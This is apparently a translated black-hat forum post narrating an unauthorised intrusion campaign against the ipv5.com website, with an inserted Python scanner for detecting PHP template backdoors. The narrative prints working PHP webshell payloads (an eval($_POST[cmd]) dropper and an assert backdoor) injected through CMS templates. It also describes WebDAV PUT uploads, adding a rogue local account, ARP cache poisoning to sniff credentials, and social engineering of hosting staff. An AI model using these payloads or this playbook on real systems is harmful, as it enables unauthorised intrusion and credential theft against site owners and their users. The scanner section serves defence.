Author: BlAck.Eagle [B.H.S.T]
When it comes to ipv5.com, I expect all my friends in the security circle are familiar with it, and I am also quite tired of its current profit model. It is a relatively simple English-letter site, and now it charges as well, so this evil idea emerged.
Every time I perform a test, I generally think through the process first. This time is no exception. This kind of website usually needs to start with sniffing, so I planned to first use Zwell's IIS PUT scanner to quickly scan the web server structure of the target network segment, because it helps collect many useful banners.
After scanning, I found an IP address with PUT set to On. In many cases PUT shows as available but the upload still fails, possibly because WebDAV is disabled or the directory has no write permission. Only in this format can it escape. Then, uploading through the one-sentence client, the server returned a 500 error many times and the trojan was killed; finally the webshell provided by brother Psjj did the job.
A quick look at the permissions showed they were still fairly broad. Through the webshell's download function I uploaded cmd, the privilege-escalation tool pr, and nc. A user was added to the local machine through nc, and the account was added successfully. I logged on to the server.
Once on the server, the first thing to do is patch its holes: first disable WebDAV under "Web Service Extensions", then open the website properties, go to the home directory, and remove the write permission!
At this point I looked back at the target site. First I simply pinged the ipv5.com website, but it could not be pinged. Then I checked the subnet mask with ipconfig /all and found it was 255.255.255.128; ah, really disappointing, it is not in the same CIDR block as the target. But the next step is clearer: we just need to penetrate a server at 125.254.44.126, and then we will be in the same CIDR block as the target.
Just do it, and chat with friends along the way. At this point, in the target's 2xx network segment, a simple socially engineered account got me into a php168 back end. It should be noted that this php168 system was already the latest version: if you add a trojan directly to a template, it is cleared immediately after being written. Then I thought of the select into method, but that also failed, the server rejecting it for this ordinary mysql account.
After a long time, I had no choice but to edit a common template file, template/default/none.htm, writing into it:
<script language="php">phpinfo()</script>
Tested by black.eagle
and then, in "System Settings" - "Website Homepage Settings", click Submit, so that a static page is generated for the homepage.
You can see that oo.php has actually been executed, but when it is written as
<script language="php">
fputs(fopen("horind.php","w"),"<? eval($_POST[cmd]);?>")
</script>
Tested by black.eagle
eval is filtered out. Written in the following format instead, it is indeed written, but it cannot be executed in the client's "EXPERT mode".
<script language="php">assert($_POST[cmd])</script>
Tested by black.eagle
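The template trick described above relies on a CMS filter that strips "<?" tags but not the older `<script language="php">` open tag, which is why phpinfo() ran while the eval dropper was caught. As an added example that is not part of the original post, here is a small Python integrity check a defender can run over CMS template directories to flag server-side PHP in files that should be static HTML; the sample templates are constructed for this example.

```python
import re

# Signatures of server-side PHP code inside files that should be static HTML.
# The <script language="php"> open tag was removed in PHP 7.0, so on older
# engines it is a way to smuggle code past filters that only look for "<?".
SIGNATURES = [
    ("php_script_tag", re.compile(r"<script\s+language\s*=\s*['\"]?php['\"]?\s*>", re.I)),
    ("php_open_tag", re.compile(r"<\?(?!xml\b)", re.I)),          # any <? except <?xml
    ("dynamic_eval", re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)),
    ("file_write", re.compile(r"\b(?:fputs|fwrite|file_put_contents)\s*\(", re.I)),
    ("request_input", re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)),
]

def scan_template(text):
    """Return a list of (line_no, signature, snippet) for every suspicious line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((no, name, line.strip()[:80]))
    return hits

def severity(hits):
    """Rank a template: code that evaluates or writes request input is the worst case."""
    names = {h[1] for h in hits}
    if "request_input" in names and names & {"dynamic_eval", "file_write"}:
        return "critical"
    if names & {"php_script_tag", "php_open_tag", "dynamic_eval", "file_write"}:
        return "high"
    return "medium" if hits else "clean"

# Constructed sample templates (not files taken from any real system).
CLEAN_TEMPLATE = """<html><head><title>Home</title></head>
<body><script language="javascript">var x = 1;</script></body></html>"""

DROPPER_TEMPLATE = """<html><body>
<script language="php">fputs(fopen("x.php","w"),"<? eval($_POST[cmd]);?>")</script>
</body></html>"""

ASSERT_TEMPLATE = """<script language="php">assert($_POST[cmd])</script>"""

if __name__ == "__main__":
    for label, tpl in [("clean", CLEAN_TEMPLATE), ("dropper", DROPPER_TEMPLATE),
                       ("assert", ASSERT_TEMPLATE)]:
        hits = scan_template(tpl)
        print(f"{label}: {severity(hits)}")
        for no, name, snippet in hits:
            print(f"  line {no}: {name}: {snippet}")
```

Run it over every .htm/.html under a CMS template directory from a cron job and alert on anything above "clean"; the `php_open_tag` check alone would have missed the first payload in the post.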
That was as far as it went there, and then while searching around I got a PHPCMS back end. This back end had been left blank. Although getting a webshell from phpcms is simple, I could not execute SQL statements here, the admin having disabled it, and then via
admin.php?mod=phpcms&file=safe&action=see_code&files=eagle.php
the small shell (pony) was still not successful, for whatever reason. I also hope that, after reading this, you will go look at the official site directly.
The webshell was obtained, and system permissions were obtained thanks to the admin's negligence!
I looked at the subnet mask: the same network segment as ipv5.com. Good, this is a good position to work from! The gateway was determined to be .129. ping and tracert could not reach the other side's IP; it seems there is a firewall, and the ARP firewall was not an easy breakthrough, so I only slightly changed Cain's packet-sending interval, that is, remote ARP cache poisoning every 19 seconds instead of the default 30!
Some accounts were also sniffed.
However, after sniffing for a while the machine went down, and pings to the target network segment became unreachable. Rather than wait until the next day, I could only ask the IDC customer service to restart it for us; although I knew it was in the Great Wall Broadband data center, I did not know which IDC. There was nothing for it but to go to a site in that CIDR block and chat with its webmaster to get the information.
Then, through the customer service QQ mentioned above, I contacted the customer service representative responsible for the server and waited about 10 minutes;
the machine was started and could be pinged. Thank you for your attitude!
After some time I got the shell, and vaguely felt the target may be behind a CDN, because the IP address changed a lot.
If the ipv5 webmaster sees this article, please do not be angry. I do not intend to penetrate further and hope to become friends!
If you have any questions, please contact me at the Black Hat forum! Finally, I would like to thank Robert and PSJJ.